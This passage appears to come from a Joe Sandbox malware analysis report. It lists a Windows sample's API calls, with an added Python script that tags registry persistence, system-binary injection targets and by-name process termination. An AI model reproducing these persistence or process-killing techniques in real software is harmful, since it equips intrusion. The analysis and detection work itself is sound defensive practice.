                                                                            • lstrcmpiW.KERNEL32(?,-00832F28), ref: 007C251A
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 007C253C
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C255A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C2567
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007C257F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C2591
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                                                            • String ID: A#v
                                                                            • API String ID: 1193533834-4158731453
                                                                            • Opcode ID: ee4f0d72e1cbe6b1434c8127ecd3c90be7997c778cf51a79f3cc1b6ff27f35b6
                                                                            • Instruction ID: cd652db43d51fdacfda2dcaffbf232749e4ce0145e114f13d9c0cc06ae5b26cd
                                                                            • Opcode Fuzzy Hash: ee4f0d72e1cbe6b1434c8127ecd3c90be7997c778cf51a79f3cc1b6ff27f35b6
                                                                            • Instruction Fuzzy Hash: AD21EA75901218DBDB24DF60DD9CBAABB78FB84700F2046DCE509A6291D7789F81DF50
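Three of the function records above carry the security-relevant behaviour of this sample in their raw argument values: the record at 007C9F00 calls GetModuleFileNameW, formats "SOFTWARE\%s", opens a key under hive 80000001 (HKEY_CURRENT_USER) and writes a value with type 00000001 (REG_SZ) whose name is a GUID, i.e. it records its own path under a GUID-named HKCU key; the record at 007C9CF2 builds "%s\EXPLORER.EXE", "%s\SVCHOST.EXE" and "%s\CMD.EXE" from the Windows and System32 directories (plausible injection targets); and the record at 007C24A4 walks the process list with Toolhelp32, compares names with lstrcmpiW, opens a match with 001FFFFF (PROCESS_ALL_ACCESS) and terminates it. The following triage script is an added example and not Joe Sandbox code: it parses these "APIs" / "Strings" / "String ID" lines as they appear in the report, decodes the constants, and tags each record. The record layout, the rule set, the tag names and the heuristic that the literal referenced just before the "SOFTWARE\%s" format string is its %s argument (cdecl pushes arguments right to left) are this example's own assumptions; the sample input is excerpted verbatim from the three records.

```python
# Added example (not Joe Sandbox code): triage the per-function "APIs"/"Strings"/"String ID"
# lines of a Joe Sandbox disassembly report. Record layout and rules are assumptions of this example.
import re
from collections import namedtuple

API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)", re.I)
XREF_RE = re.compile(r"^•\s*(?P<s>.*), xrefs: (?P<ref>[0-9A-F]+)$", re.I)
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
PROCESS_ALL_ACCESS = 0x1FFFFF
REG_OPEN = {"RegOpenKeyW", "RegOpenKeyExW", "RegCreateKeyW", "RegCreateKeyExW"}
KILL_SET = {"CreateToolhelp32Snapshot", "Process32FirstW", "OpenProcess", "TerminateProcess"}
Call = namedtuple("Call", "api mod args ref")


def _arg(tok):
    # Eight hex digits become an int; "?" and junk pointer text stay as-is.
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-F]{8}", tok, re.I) else tok


def parse_records(text):
    """Split the report into (calls, strings) per function; strings map literal -> xref or None."""
    records = []
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":  # every function record opens with this heading
            records.append(([], {}))
        elif not records:
            continue
        elif m := API_RE.match(s):
            args = [_arg(t) for t in m["args"].split(",")] if m["args"] else []
            records[-1][0].append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
        elif m := XREF_RE.match(s):
            records[-1][1][m["s"]] = int(m["ref"], 16)
        elif s.startswith("• String ID:"):  # "$"-joined literals, no addresses
            for part in filter(None, s.split(":", 1)[1].strip().split("$")):
                records[-1][1].setdefault(part, None)
    return records


def _resolve_key(strings):
    """Heuristic: arguments are pushed right to left, so the literal referenced just before
    the 'SOFTWARE\\%s' format string is its %s argument (here the GUID-named subkey)."""
    fmt = next((s for s in strings if s.upper().startswith("SOFTWARE\\")), "?")
    if "%s" not in fmt or strings.get(fmt) is None:
        return fmt
    earlier = [(x, s) for s, x in strings.items() if x is not None and x < strings[fmt]]
    return fmt.replace("%s", max(earlier)[1]) if earlier else fmt


def classify(calls, strings):
    names = {c.api for c in calls}
    found = []
    if {"GetModuleFileNameW", "RegSetValueExW"} <= names:  # own path written to a registry value
        hive = next((HIVES[c.args[0]] for c in calls if c.api in REG_OPEN and c.args and c.args[0] in HIVES), "unknown hive")
        sv = next(c for c in calls if c.api == "RegSetValueExW").args
        vname, vtype = (sv[1], REG_TYPES.get(sv[3], "?")) if len(sv) > 3 else ("?", "?")
        found.append(("self_path_to_registry",
                      f"{hive}\\{_resolve_key(strings)} value {vname} ({vtype}) <- GetModuleFileNameW"))
    if KILL_SET <= names:  # Toolhelp32 walk, name compare, terminate
        acc = next(c for c in calls if c.api == "OpenProcess").args[:1]
        label = "PROCESS_ALL_ACCESS" if acc == [PROCESS_ALL_ACCESS] else f"access {acc[0] if acc else '?'}"
        found.append(("kill_process_by_name", f"Toolhelp32 walk + lstrcmpiW + TerminateProcess, OpenProcess {label}"))
    if names & {"GetWindowsDirectoryW", "GetSystemDirectoryW"}:  # paths to system binaries (injection targets)
        targets = [s for s in strings if re.fullmatch(r"%s\\[\w.]+\.EXE", s, re.I)]
        if targets:
            found.append(("system_exe_paths", ", ".join(targets)))
    return found


def analyze(text):
    """Key each record by its first call's address, as the report does."""
    return {f"{calls[0].ref:08X}": classify(calls, strings) for calls, strings in parse_records(text) if calls}


# Constructed input: lines excerpted verbatim from three function records of this report.
SAMPLE = r"""
APIs
• _memset.LIBCMT ref: 007C9F00
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007C9F16
• __snwprintf.LIBCMT ref: 007C9F3A
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C9F55
• RegSetValueExW.ADVAPI32(?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000000,00000001,?,00000002), ref: 007C9F88
Strings
• {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007C9F24
• SOFTWARE\%s, xrefs: 007C9F29
APIs
• GetWindowsDirectoryW.KERNEL32(8U|,00000104,?,007C5538,00000000), ref: 007C9CF2
• GetSystemDirectoryW.KERNEL32(8U|,00000104), ref: 007C9D2E
• String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE$8U|
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C24A4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 007C24CC
• lstrcmpiW.KERNEL32(?,-00832F28), ref: 007C251A
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 007C253C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 007C255A
"""

if __name__ == "__main__":
    for addr, found in analyze(SAMPLE).items():
        for tag, detail in found:
            print(f"{addr}: {tag}: {detail}")
```

The resolved key HKEY_CURRENT_USER\SOFTWARE\{DE7C4D5F-E773-43F0-B029-ED407FF538E8} with the REG_SZ value {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8} is the artifact to hunt for on a host; it is inferred from the xref ordering, so confirm it against the dumped registry before using it as an indicator. The %s in the paths of the second record is the Windows or System32 directory, which is why the same rule accepts either GetWindowsDirectoryW or GetSystemDirectoryW.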
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?), ref: 007E2049
                                                                              • Part of subcall function 007E2450: CoInitialize.OLE32(00000000), ref: 007E2466
                                                                              • Part of subcall function 007E2450: CoCreateGuid.COMBASE(c ~), ref: 007E2478
                                                                              • Part of subcall function 007E2450: StringFromGUID2.COMBASE(c ~,?,00000027), ref: 007E2490
                                                                              • Part of subcall function 007E2450: wsprintfA.USER32 ref: 007E24AB
                                                                              • Part of subcall function 007E2450: LocalAlloc.KERNEL32(00000040,00000068), ref: 007E24B8
                                                                              • Part of subcall function 007E2450: und_memcpy.LIBCMTD ref: 007E2505
                                                                              • Part of subcall function 007E2450: LocalFree.KERNEL32(00000000), ref: 007E2511
                                                                              • Part of subcall function 007E2450: CoUninitialize.COMBASE ref: 007E2517
                                                                              • Part of subcall function 007DFFF0: socket.WS2_32(00000002,00000001,00000006), ref: 007DFFFF
                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 007E20F0
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E2428
                                                                              • Part of subcall function 007E0950: WSACreateEvent.WS2_32 ref: 007E09B0
                                                                              • Part of subcall function 007E2530: LocalAlloc.KERNEL32(00000040,00000318), ref: 007E2540
                                                                              • Part of subcall function 007E2530: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007E2558
                                                                              • Part of subcall function 007E2530: LocalFree.KERNEL32(00000000), ref: 007E256B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E23B3
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000020), ref: 007E23D8
                                                                            • und_memcpy.LIBCMTD ref: 007E23F7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E240E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E241B
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E2437
                                                                            • closesocket.WS2_32(00000000), ref: 007E2444
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                              • Part of subcall function 007E0CD0: WSACreateEvent.WS2_32 ref: 007E0D30
                                                                              • Part of subcall function 007E26F0: LocalAlloc.KERNEL32(00000040,00000280), ref: 007E2700
                                                                              • Part of subcall function 007E26F0: lstrcpyW.KERNEL32(0000001C,CPU001), ref: 007E2735
                                                                              • Part of subcall function 007E26F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007E2754
                                                                              • Part of subcall function 007E26F0: LocalFree.KERNEL32(00000020), ref: 007E2762
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CreateEvent$Alloc$InfoLocale___crtund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownsocketwsprintf
                                                                            • String ID:
                                                                            • API String ID: 3642594451-0
                                                                            • Opcode ID: a04954232137ddadfcc9cde9962d84a368301a9696dc71c735cd71def1820828
                                                                            • Instruction ID: 55c652746c67a441223f146762280bf117e0fa1ac7e07b187bdae3710f7d8122
                                                                            • Opcode Fuzzy Hash: a04954232137ddadfcc9cde9962d84a368301a9696dc71c735cd71def1820828
                                                                            • Instruction Fuzzy Hash: B5B17FB5A00358AFEB24DB95CC45FEE7379AB48700F504598F608A71C2E7B46E85CF62
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CB3FF
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007CB426
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CB438
                                                                            • _memset.LIBCMT ref: 007CB446
                                                                            • GetSystemTime.KERNEL32(?), ref: 007CB465
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 007CB476
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CB3E9
                                                                            • SOFTWARE\%s, xrefs: 007CB3EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3491885642-1408172494
                                                                            • Opcode ID: 3a61c4eaa340324650045c2b8fa0fa0b5810f8cad64558505493c9390c8920fc
                                                                            • Instruction ID: 0298569d9dbc013d386938e229e6d6dc6dbd0cb793c42b874afb7e5398e3bede
                                                                            • Opcode Fuzzy Hash: 3a61c4eaa340324650045c2b8fa0fa0b5810f8cad64558505493c9390c8920fc
                                                                            • Instruction Fuzzy Hash: 29115471A44309BAEB14DBB09C4BFFA732CAB54704F40095CBA15E6182FBB9975487A1
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C4670
                                                                            • __snwprintf.LIBCMT ref: 007C468E
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,000017FC,00000000), ref: 007C46B5
                                                                            • RegSetValueExW.ADVAPI32(000017FC,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000000,00000003,008334D4,007C45E8), ref: 007C46D4
                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 007C46E2
                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 007C46F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 749045061-3800169908
                                                                            • Opcode ID: 4ed3440443d8d0f6c32ba34e1a976b5bc322f79a01f4cf667c932465c227e5c8
                                                                            • Instruction ID: 014fd10a9dc72673a49345ff3bc222974592b3ea0ce6886ddd1620b06783eba9
                                                                            • Opcode Fuzzy Hash: 4ed3440443d8d0f6c32ba34e1a976b5bc322f79a01f4cf667c932465c227e5c8
                                                                            • Instruction Fuzzy Hash: 5B11C875740308FBE724DBB4EC8AFAA7378AB48F00F104448BB05EA1C1E6B59B109794
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C50B0
                                                                            • __snwprintf.LIBCMT ref: 007C50CE
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 007C50F5
                                                                            • RegSetValueExW.ADVAPI32(?,{D4D7F2EA-38C9-468B-BF0E-B76E00A488F0},00000000,00000003,?,00000B3C), ref: 007C5115
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C5123
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C5134
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                            • API String ID: 749045061-3591707405
                                                                            • Opcode ID: 13cb38fa9fa7125cbd9420332803674c39e3b336e294ee688b53608096f15df1
                                                                            • Instruction ID: bbe9a64810e5c47339573c5857d2381239995f367da1b3bf6fe085da3803ce3d
                                                                            • Opcode Fuzzy Hash: 13cb38fa9fa7125cbd9420332803674c39e3b336e294ee688b53608096f15df1
                                                                            • Instruction Fuzzy Hash: 3C11C87475030CBBE724D7B0DC4EFAA7378BB44F00F504548B704AA2C0E6B5AB409794
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C6B42
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C6C3D
                                                                              • Part of subcall function 007E0950: WSACreateEvent.WS2_32 ref: 007E09B0
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C6C9A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DE6
                                                                              • Part of subcall function 007C8A80: LocalFree.KERNEL32(00000000), ref: 007C8AE0
                                                                              • Part of subcall function 007C8A80: LocalFree.KERNEL32(00000000), ref: 007C8AF0
                                                                              • Part of subcall function 007C8A80: LocalAlloc.KERNEL32(00000040,00030010), ref: 007C8B3B
                                                                              • Part of subcall function 007C8A80: LocalAlloc.KERNEL32(00000040,00008AD0), ref: 007C8B55
                                                                              • Part of subcall function 007C8A80: _memmove.LIBCMT ref: 007C8B76
                                                                              • Part of subcall function 007C8A80: lstrcpyW.KERNEL32(00000000,00000000), ref: 007C8B86
                                                                              • Part of subcall function 007C8A80: lstrcpyW.KERNEL32(-00010000,00000000), ref: 007C8B99
                                                                              • Part of subcall function 007C8A80: lstrcpyW.KERNEL32(-00020000,00000000), ref: 007C8BAD
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                              • Part of subcall function 007C9400: LocalAlloc.KERNEL32(00000040,007C6D26,?,007C6D8A,00000000,00000000,?), ref: 007C9416
                                                                              • Part of subcall function 007C9400: _memmove.LIBCMT ref: 007C9435
                                                                              • Part of subcall function 007C9400: lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 007C94FF
                                                                              • Part of subcall function 007C9400: StrStrIW.SHLWAPI(?,.DLL), ref: 007C9511
                                                                              • Part of subcall function 007C9400: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007C953C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DAD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DBA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DFC
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C6E68
                                                                            • closesocket.WS2_32(?), ref: 007C6E72
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFree$lstrcpy$CreateInfoLocale___crt_memmovewnsprintf$EventFileclosesocketsetsockoptshutdown
                                                                            • String ID:
                                                                            • API String ID: 3185571019-0
                                                                            • Opcode ID: 3b3621269276443db3ca1223972fd66a7437a60e3a73e039ef12e0e3d42c10a5
                                                                            • Instruction ID: bb91c880b029dff92079fd1b53f0e98e3770acd8135acf0bb3409e5768bae1db
                                                                            • Opcode Fuzzy Hash: 3b3621269276443db3ca1223972fd66a7437a60e3a73e039ef12e0e3d42c10a5
                                                                            • Instruction Fuzzy Hash: 96B10FB5E00218AFEB24DB94CC85FEEB778BB48300F10859DE619A7281D7755A84CFA1
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • _memmove.LIBCMT ref: 007D7A48
                                                                            • lstrlenW.KERNEL32(?), ref: 007D7A6C
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007D7A7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                            • String ID:
                                                                            • API String ID: 39496755-0
                                                                            • Opcode ID: 9bc30a87fca97ee193dd98680f870b96f0445de18033c47730115b99af3cb3d3
                                                                            • Instruction ID: 37f632be823020ea239104815396722e19a7fa02884e8835d654111881648c12
                                                                            • Opcode Fuzzy Hash: 9bc30a87fca97ee193dd98680f870b96f0445de18033c47730115b99af3cb3d3
                                                                            • Instruction Fuzzy Hash: 84710BB4A0410AEFCB08CF98D495EEEB7B1FF48304F10855AE905A7351E738AA55CFA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                            • String ID:
                                                                            • API String ID: 39496755-0
                                                                            • Opcode ID: dab1a47b9357d0ae6be6e931dc1ec55a14d7c66056099be01f7771a2d9aaa004
                                                                            • Instruction ID: c66ff33e33aedc472ed05a411d2b9cb1017d703414d317cd24b5828ef6c2b29b
                                                                            • Opcode Fuzzy Hash: dab1a47b9357d0ae6be6e931dc1ec55a14d7c66056099be01f7771a2d9aaa004
                                                                            • Instruction Fuzzy Hash: E471EB75A0410ADFCF18CF98D985BAEB7B2FF48304F108559E905A7341E738AE51DBA4
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007DEC09
                                                                            • und_memcpy.LIBCMTD ref: 007DEC2F
                                                                            • und_memcpy.LIBCMTD ref: 007DEC4A
                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 007DEC68
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DEC84
                                                                            Memory Dump Source
